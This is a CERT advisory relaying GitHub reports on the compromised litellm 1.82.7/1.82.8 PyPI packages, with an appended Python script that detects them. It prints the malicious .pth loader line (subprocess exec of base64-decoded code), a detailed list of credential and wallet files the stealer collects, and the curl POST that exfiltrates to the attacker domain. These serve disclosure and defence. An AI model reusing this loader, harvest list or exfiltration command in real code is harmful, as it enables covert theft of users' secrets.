
=====================================================================

                            CERT-Renater

                Information Note No. 2026/VULN337
_____________________________________________________________________

DATE                : 27/03/2026

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running litellm versions 1.82.7, 1.82.8.

=====================================================================
https://github.com/BerriAI/litellm/issues/24512
https://github.com/BerriAI/litellm/issues/24518
_____________________________________________________________________

isfinne opened on Mar 24, 2026

[LITELLM TEAM] - For updates from the team, please see: #24518

[Security]: CRITICAL: Malicious litellm_init.pth in litellm 1.82.8 PyPI
package — credential stealer

Summary

The litellm==1.82.8 wheel package on PyPI contains a malicious .pth
file (litellm_init.pth, 34,628 bytes) that automatically executes a
credential-stealing script every time the Python interpreter starts — no
import litellm required.

This is a supply chain compromise. The malicious file is listed in the
package's own RECORD:

litellm_init.pth,sha256=ceNa7wMJnNHy1kRnNCcwJaFjWX3pORLfMh7xGL8TUjg,34628


Reproduction

pip download litellm==1.82.8 --no-deps -d /tmp/check
python3 -c "
import zipfile, os
whl = '/tmp/check/' + [f for f in os.listdir('/tmp/check') if f.endswith('.whl')][0]
with zipfile.ZipFile(whl) as z:
    pth = [n for n in z.namelist() if n.endswith('.pth')]
    print('PTH files:', pth)
    for p in pth:
        print(z.read(p)[:300])
"


You will see litellm_init.pth containing:

import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('...'))"])


Malicious Behavior (full analysis)

The payload is double base64-encoded. When decoded, it performs the
following:


Stage 1: Information Collection

The script collects sensitive data from the host system:

    System info: hostname, whoami, uname -a, ip addr, ip route
    Environment variables: printenv (captures all API keys, secrets, tokens)
    SSH keys: ~/.ssh/id_rsa, ~/.ssh/id_ed25519, ~/.ssh/id_ecdsa, ~/.ssh/id_dsa, ~/.ssh/authorized_keys, ~/.ssh/known_hosts, ~/.ssh/config
    Git credentials: ~/.gitconfig, ~/.git-credentials
    AWS credentials: ~/.aws/credentials, ~/.aws/config, IMDS token + security credentials
    Kubernetes secrets: ~/.kube/config, /etc/kubernetes/admin.conf, /etc/kubernetes/kubelet.conf, /etc/kubernetes/controller-manager.conf, /etc/kubernetes/scheduler.conf, service account tokens
    GCP credentials: ~/.config/gcloud/application_default_credentials.json
    Azure credentials: ~/.azure/
    Docker configs: ~/.docker/config.json, /kaniko/.docker/config.json, /root/.docker/config.json
    Package manager configs: ~/.npmrc, ~/.vault-token, ~/.netrc, ~/.lftprc, ~/.msmtprc, ~/.my.cnf, ~/.pgpass, ~/.mongorc.js
    Shell history: ~/.bash_history, ~/.zsh_history, ~/.sh_history, ~/.mysql_history, ~/.psql_history, ~/.rediscli_history
    Crypto wallets: ~/.bitcoin/, ~/.litecoin/, ~/.dogecoin/, ~/.zcash/, ~/.dashcore/, ~/.ripple/, ~/.bitmonero/, ~/.ethereum/keystore/, ~/.cardano/, ~/.config/solana/
    SSL/TLS private keys: /etc/ssl/private/, Let's Encrypt .pem and .key files
    CI/CD secrets: terraform.tfvars, .gitlab-ci.yml, .travis.yml, Jenkinsfile, .drone.yml, Anchor.toml, ansible.cfg
    Database credentials: PostgreSQL, MySQL, Redis, LDAP config files
    Webhook URLs: grep for Slack/Discord webhook URLs in env and config files


Stage 2: Encryption & Exfiltration

    Collected data is written to a temporary file
    A random 32-byte AES-256 session key is generated via openssl rand
    The collected data is encrypted with openssl enc -aes-256-cbc -pbkdf2
    The AES session key is encrypted with a hardcoded 4096-bit RSA public key via openssl pkeyutl -encrypt -pkeyopt rsa_padding_mode:oaep
    Both encrypted files are packed into tpcp.tar.gz
    The archive is exfiltrated via:

curl -s -o /dev/null -X POST \
  "https://models.litellm.cloud/" \
  -H "Content-Type: application/octet-stream" \
  -H "X-Filename: tpcp.tar.gz" \
  --data-binary @tpcp.tar.gz


Key Technical Details

    Trigger mechanism: .pth files in site-packages/ are executed
      automatically by the Python interpreter on startup (see Python docs
      on .pth files). No import statement is needed.
    Stealth: The payload is double base64-encoded, making it invisible
      to naive source code grep.
    Exfiltration target: https://models.litellm.cloud/ — note the domain
      litellm.cloud (NOT litellm.ai, the official domain).
    RSA public key (first 64 chars):
      MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAvahaZDo8mucujrT15ry+...


Impact

Anyone who installed litellm==1.82.8 via pip has had all environment
variables, SSH keys, cloud credentials, and other secrets collected
and sent to an attacker-controlled server.

This affects:

    Local development machines
    CI/CD pipelines
    Docker containers
    Production servers


Affected Version

    Confirmed: litellm==1.82.8 (PyPI wheel litellm-1.82.8-py3-none-any.whl)
    Other versions: Not yet checked — the attacker may have compromised
      multiple releases


Recommended Actions

    PyPI: Yank/remove litellm 1.82.8 immediately
    Users: Check for litellm_init.pth in your site-packages/ directory
    Users: Rotate ALL credentials that were present as environment variables
      or in config files on any system where litellm 1.82.8 was installed
    BerriAI: Audit PyPI publishing credentials and CI/CD pipeline for compromise


Environment

    OS: Ubuntu 24.04 (Docker container)
    Python: 3.13
    pip installed from PyPI
    Discovered: 2026-03-24

_____________________________________________________________________

[Security]: litellm PyPI package (v1.82.7 + v1.82.8) compromised —
full timeline and status #24518

isfinne opened on Mar 24, 2026

[LITELLM TEAM UPDATES]

    Compromised packages have been deleted (v1.82.7, v1.82.8)
    Compromise came from Trivy security scan dependency
    All maintainer accounts have been rotated (new maintainer accounts:
      @krrish-berri-2, @ishaan-berri)
    Proxy Docker image users were not impacted, all dependencies are
      pinned on requirements.txt
    No litellm releases will be out until we have scanned our chain
      and made sure it's safe


Next Steps

    Review all BerriAI repos for impact
    Scan CircleCI builds to understand blast radius, and mitigate it
    We've engaged Google's mandiant.security team, and are actively
      working on this with them

We are actively investigating this issue. Please reach out to us on
support@berri.ai, if you have any questions / concerns.


Summary

The litellm PyPI package was compromised by an attacker who gained access
to the maintainer's PyPI account. Malicious versions were published that
steal credentials and exfiltrate them to an attacker-controlled server.

Original detailed analysis: #24512

Hacker News discussion: https://news.ycombinator.com/item?id=47501729

What happened

    The maintainer's PyPI account (krrishdholakia) appears to have been
      hijacked by an attacker (teampcp)
    The attacker published malicious versions to PyPI that were never
      released through the official GitHub CI/CD
    GitHub releases only go up to v1.82.6.dev1 — versions 1.82.7 and
      1.82.8 on PyPI were uploaded directly by the attacker


Affected versions

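Version | Method                                                             | Trigger
--------+--------------------------------------------------------------------+--------------------------------------
1.82.7  | Payload embedded in litellm/proxy/proxy_server.py                  | Triggered on import litellm.proxy
1.82.8  | Added litellm_init.pth (34,628 bytes) + payload in proxy_server.py | Any Python startup — no import needed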

Other versions may also be affected and should be audited.


What the malicious code does

    Collects: SSH keys, environment variables (API keys, secrets),
      AWS/GCP/Azure/K8s credentials, crypto wallets, database passwords, SSL
      private keys, shell history, CI/CD configs
    Encrypts: AES-256-CBC + RSA-4096 (hardcoded public key)
    Exfiltrates: curl POST to https://models.litellm.cloud/

The exfiltration domain litellm.cloud (NOT the official litellm.ai) was
registered on 2026-03-23 via Spaceship, Inc. — just hours before the
malicious packages appeared.


Current status

    PyPI: The entire litellm package has been suspended/removed. All
      versions currently return "No matching distribution found." We reported
      the malware to PyPI via the official "Report malware" form.
    GitHub issue "[Security]: CRITICAL: Malicious litellm_init.pth in
      litellm 1.82.8 — credential stealer" (#24512): Contains the original
      detailed technical analysis (currently closed by the attacker's
      spam — see below).
    Attacker behavior: The attacker appears to be publishing hundreds of
      spam comments to suppress discussion. If this continues, we recommend
      moderating via the Hacker News thread linked above.


Recommendations for affected users

    Check if litellm_init.pth exists in your site-packages/ directory
    Rotate ALL credentials that were present as environment variables or
      config files on any system where litellm 1.82.7+ was installed
    Pin dependencies to exact versions and verify against GitHub releases
    Monitor for unauthorized access using any potentially leaked credentials


References

    Original analysis: [Security]: CRITICAL: Malicious litellm_init.pth in
      litellm 1.82.8 — credential stealer #24512
    Hacker News: https://news.ycombinator.com/item?id=47501729
    Attacker's exfil domain WHOIS: registered 2026-03-23, Spaceship Inc.,
      privacy-protected
    litellm_init.pth SHA256: ceNa7wMJnNHy1kRnNCcwJaFjWX3pORLfMh7xGL8TUjg
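
Added example (not part of the issues quoted above and not litellm code): a Python check covering the "Trigger mechanism" passage and the "check your site-packages/" recommendations in both reports. It matches .pth files against the file name and RECORD-format hash given above, flags executable .pth lines that spawn or decode code, and reads installed metadata as well, since the table above lists a .pth file only for 1.82.8. The function names, the SUSPICIOUS token list and the finding labels are assumptions of this example.

```python
import base64, hashlib, re, sys
from importlib import metadata
from pathlib import Path

# Indicators copied from the advisory above.
IOC_NAME = "litellm_init.pth"
IOC_RECORD_SHA256 = "ceNa7wMJnNHy1kRnNCcwJaFjWX3pORLfMh7xGL8TUjg"
AFFECTED = {"1.82.7", "1.82.8"}
# Assumption: heuristic tokens, modelled on the loader line quoted in the issue.
SUSPICIOUS = re.compile(r"\b(subprocess|exec|eval|base64|b64decode)\b")

def record_digest(data: bytes) -> str:
    """SHA-256 as written in a wheel RECORD: urlsafe base64, '=' padding removed."""
    raw = hashlib.sha256(data).digest()
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def executable_lines(text: str) -> list:
    """Lines that site.py passes to exec(): 'import' followed by a space or tab."""
    return [ln for ln in text.splitlines() if ln.startswith(("import ", "import\t"))]

def check_pth(path: Path) -> list:
    """Return the reasons (possibly none) why this .pth file deserves a look."""
    data = path.read_bytes()
    code = executable_lines(data.decode("utf-8", errors="replace"))
    reasons = []
    if path.name == IOC_NAME:
        reasons.append("ioc-filename")
    if record_digest(data) == IOC_RECORD_SHA256:
        reasons.append("ioc-sha256")
    if any(SUSPICIOUS.search(ln) for ln in code):
        reasons.append("exec-line-spawns-or-decodes")
    return reasons

def scan(site_dir: str) -> list:
    """Inspect one site-packages directory without importing anything from it."""
    findings = []
    for pth in sorted(Path(site_dir).glob("*.pth")):
        findings += [(pth.name, r) for r in check_pth(pth)]
    # The 1.82.7 payload sits in proxy_server.py, so also read installed metadata.
    for dist in metadata.distributions(path=[site_dir]):
        name = (dist.metadata.get("Name") or "").lower()
        if name == "litellm" and dist.version in AFFECTED:
            findings.append((f"litellm {dist.version}", "affected-version"))
    return findings

if __name__ == "__main__":
    for target in sys.argv[1:]:
        for item, reason in scan(target):
            print(f"{target}: {item}: {reason}")
```

Run it with an interpreter from outside the environment being inspected (or with `python -S`, which skips the site module) and pass the site-packages path as an argument, because starting the affected interpreter normally processes the .pth file before any script runs.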

=========================================================
+ CERT-RENATER        |    tel : 01-53-94-20-44         +
+ 23/25 Rue Daviel    |    fax : 01-53-94-20-41         +
+ 75013 Paris         |   email:cert@support.renater.fr +
=========================================================




